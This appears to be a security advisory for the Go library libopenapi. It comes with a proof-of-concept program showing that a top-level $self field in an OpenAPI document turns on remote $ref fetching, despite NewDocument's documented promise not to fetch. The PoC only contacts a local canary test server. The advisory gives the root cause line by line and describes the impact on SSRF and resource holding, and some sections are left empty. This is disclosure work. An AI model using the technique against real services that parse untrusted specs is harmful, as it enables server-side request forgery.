package main
import (
"fmt"
"io"
"log/slog"
"net/http"
"net/http/httptest"
"os"
"sync/atomic"
"github.com/pb33f/libopenapi"
"github.com/pb33f/libopenapi/datamodel"
)
// quietLogger builds a *slog.Logger backed by a text handler that writes to
// io.Discard, so every record logged through it is dropped.
func quietLogger() *slog.Logger {
	discard := slog.NewTextHandler(io.Discard, nil)
	return slog.New(discard)
}
// remoteYAML is the OpenAPI document the canary server returns for every
// request. It defines components.schemas.RemoteThing, the schema targeted by
// the external $ref in the generated root spec.
//
// YAML nesting is expressed purely through indentation, so the leading spaces
// inside this raw string are significant: without them RemoteThing would be a
// top-level key and "#/components/schemas/RemoteThing" would not exist.
const remoteYAML = `openapi: 3.1.0
info:
  title: canary
  version: 1.0.0
paths: {}
components:
  schemas:
    RemoteThing:
      type: object
      properties:
        canary: { type: string }
`
// newCanary starts an httptest server that answers every request with
// remoteYAML (served as application/yaml) and counts how many requests it
// has received.
//
// It returns the running server together with a pointer to the request
// counter. The counter is updated with atomic.AddInt32, so callers should read
// it with atomic.LoadInt32. The caller is responsible for closing the server.
func newCanary() (*httptest.Server, *int32) {
	counter := new(int32)
	handler := func(w http.ResponseWriter, _ *http.Request) {
		atomic.AddInt32(counter, 1)
		w.Header().Set("Content-Type", "application/yaml")
		fmt.Fprint(w, remoteYAML)
	}
	return httptest.NewServer(http.HandlerFunc(handler)), counter
}
// spec renders the root OpenAPI 3.2.0 document used by each test case.
//
// base is the URL of the canary server; it is used both for the optional
// "$self" value (base + "/root.yaml") and for the external schema reference
// (base + "/remote.yaml#/components/schemas/RemoteThing"). When withSelf is
// false the "$self" line is omitted entirely.
//
// The returned bytes are YAML, so the indentation inside the template is
// significant: the $ref must be nested under components.schemas.Thing for the
// document to contain an external schema reference at all.
func spec(base string, withSelf bool) []byte {
	self := ""
	if withSelf {
		self = "$self: " + base + "/root.yaml\n"
	}
	// %s directly before "info:" lets the optional $self line (which carries
	// its own trailing newline) slot in as a top-level key.
	return fmt.Appendf(nil, `openapi: 3.2.0
%sinfo:
  title: libopenapi self-ssrf canary
  version: 1.0.0
paths: {}
components:
  schemas:
    Thing:
      $ref: %s/remote.yaml#/components/schemas/RemoteThing
`, self, base)
}
// result is the observation recorded for a single runCase invocation.
type result struct {
	// label identifies the case in the printed report.
	label string
	// hits is the canary server's request counter as read by runCase.
	hits int32
	// allowRemote and skipExternalRefs mirror AllowRemoteLookup and
	// SkipExternalRefResolution from the root index configuration.
	allowRemote, skipExternalRefs bool
	// baseURL is the root index BaseURL rendered as a string, or "<nil>"
	// when the configuration has none.
	baseURL string
}
// runCase executes one scenario against a fresh canary server and reports
// what was observed.
//
// label is echoed in diagnostics and stored in the returned result. withSelf
// controls whether the generated spec carries a top-level $self. skipExternal
// builds the document with SkipExternalRefResolution enabled.
//
// The returned result always carries the canary's request count, including
// when document creation fails, so a fetch that happened before the failure is
// not silently reported as zero. The index settings (allowRemote,
// skipExternalRefs, baseURL) are filled in only when the document exposes a
// rolodex with a root index.
func runCase(label string, withSelf bool, skipExternal bool) result {
	srv, hits := newCanary()
	defer srv.Close()

	specBytes := spec(srv.URL, withSelf)

	var (
		doc libopenapi.Document
		err error
	)
	switch {
	case skipExternal, !withSelf:
		// Both negative controls use an explicit configuration. The library
		// logs an error when it can't resolve the ref, so route its logger to
		// a discarding handler to keep the report output readable.
		cfg := datamodel.NewDocumentConfiguration()
		cfg.Logger = quietLogger()
		if skipExternal {
			cfg.SkipExternalRefResolution = true
		}
		doc, err = libopenapi.NewDocumentWithConfiguration(specBytes, cfg)
	default:
		// Positive case: plain NewDocument(), whose docstring (document.go:137)
		// states it "will NOT automatically follow ... any file or remote references".
		doc, err = libopenapi.NewDocument(specBytes)
	}
	if err != nil {
		fmt.Printf("[%s] NEW_DOCUMENT_ERROR: %v\n", label, err)
		// Still report whatever the canary saw before the failure.
		return result{label: label, hits: atomic.LoadInt32(hits)}
	}

	// A build error is reported but does not abort the case: the hit counter
	// is the signal of interest, regardless of whether the model built.
	if _, buildErr := doc.BuildV3Model(); buildErr != nil {
		msg := buildErr.Error()
		if len(msg) > 80 {
			msg = msg[:80] + "..."
		}
		fmt.Printf("[%s] build_err=%q\n", label, msg)
	}

	r := result{label: label, hits: atomic.LoadInt32(hits)}

	rolo := doc.GetRolodex()
	if rolo == nil || rolo.GetRootIndex() == nil {
		return r
	}
	cfg := rolo.GetRootIndex().GetConfig()
	r.allowRemote = cfg.AllowRemoteLookup
	r.skipExternalRefs = cfg.SkipExternalRefResolution
	r.baseURL = "<nil>"
	if cfg.BaseURL != nil {
		r.baseURL = cfg.BaseURL.String()
	}
	return r
}
// main runs every scenario through runCase, prints the observed settings and
// canary hit count for each, and compares "was the canary hit at all" with the
// expectation recorded for that scenario.
//
// The process exits with status 0 when every scenario matches its expectation
// and with status 1 otherwise.
func main() {
	type scenario struct {
		label        string
		withSelf     bool
		skipExternal bool
		expectHits   bool
	}
	scenarios := []scenario{
		{label: "default-with-self (POSITIVE: bug)", withSelf: true, skipExternal: false, expectHits: true},
		{label: "default-no-self (NEGATIVE: default safety)", withSelf: false, skipExternal: false, expectHits: false},
		{label: "skip-with-self (NEGATIVE: caller opted out)", withSelf: true, skipExternal: true, expectHits: false},
	}

	var failures int
	for _, sc := range scenarios {
		res := runCase(sc.label, sc.withSelf, sc.skipExternal)
		fmt.Printf("[%s]\n hits=%d allowRemote=%v skipExternal=%v baseURL=%s\n",
			res.label, res.hits, res.allowRemote, res.skipExternalRefs, res.baseURL)

		if got := res.hits > 0; got != sc.expectHits {
			fmt.Printf(" MISMATCH: expected hits=%v, got hits=%v\n", sc.expectHits, got)
			failures++
			continue
		}
		fmt.Print(" OK\n")
	}

	if failures > 0 {
		fmt.Printf("\n%d mismatch(es).\n", failures)
		os.Exit(1)
	}
	fmt.Println("\nAll assertions matched expected behavior (bug present).")
	os.Exit(0)
}
Summary
`libopenapi.NewDocument(spec).BuildV3Model()` is documented as never automatically following remote `$ref`s, but a top-level `$self` URL in an OpenAPI 3.1 or 3.2 document silently flips that switch. The document-supplied `$self` is copied into the index's `BaseURL`, which is the gate that turns on remote-ref lookup. Any external `$ref` in the same document with a recognized extension (`.yaml`/`.yml`/`.json`) is then fetched via Go's default `http.Client`, with no opt-in from the caller needed.

Root Cause
Source path through the library:
- `datamodel/spec_info.go:184-196` extracts a top-level `$self` value from OpenAPI 3.1/3.2 documents into `SpecInfo.Self`. No validation, no opt-in.
- `document.go:130-143`: `NewDocument()` documents that the function "will NOT automatically follow ... any file or remote references."
- `document.go:327-346`: `BuildV3Model()` fabricates a `datamodel.NewDocumentConfiguration()` if the caller passed none. The defaults are `BaseURL == nil`, `AllowRemoteReferences == false`. It then calls `v3low.CreateDocumentFromConfig(info, config)`.
- `datamodel/low/v3/create_document.go:162-201` is the leak: when `config.BaseURL == nil` and `info.Self != ""`, the document's `$self` URL is parsed and assigned to a local `baseURL`, which is then copied into `idxConfig.BaseURL` (line 201).
- `create_document.go:251` is the gate: `if idxConfig.BaseURL != nil || config.AllowRemoteReferences` constructs a `RemoteFS`, sets `idxConfig.AllowRemoteLookup = true`, and adds it to the rolodex. Caller-supplied vs `$self`-derived `BaseURL` is no longer distinguishable.
- `index/rolodex_remote_loader.go:485-490` installs `http.Client{Timeout: 120 * time.Second}.Get` as the default `RemoteHandlerFunc` when the caller didn't supply one.
- `index/find_component_external.go:40-49` opens external refs through the rolodex when the URL has a recognized extension. `SkipExternalRefResolution` (line 21) is the only short-circuit, and it is off by default.

The net effect: a `$self` field in the document is sufficient to convert "never fetch remote refs" into "fetch any remote ref."

Reproduction
Place the 3 files in a directory and run `go run .`.

- `main.go`
- `go.mod`
- `go.sum`

Expected output:
Impact
The library's documented contract for `NewDocument()` is "no automatic remote/file ref resolution." Anyone reading that promise and feeding attacker-supplied OpenAPI documents to `NewDocument(...).BuildV3Model()` is affected.

The attacker controls:
`.yaml`/`.yml`/`.json` (unless the caller sets `AllowUnknownExtensionContentDetection`, which is off by default)

The primitive is:
`Go-http-client/1.1` with a 120 s timeout, useful for slow-loris-style holding of resources in the parser process.

It is not arbitrary-protocol: Go's `http.Client.Get` won't speak `file://`, `gopher://`, or talk to non-HTTP services. The fetched body is also parsed as YAML/JSON, which constrains the response shape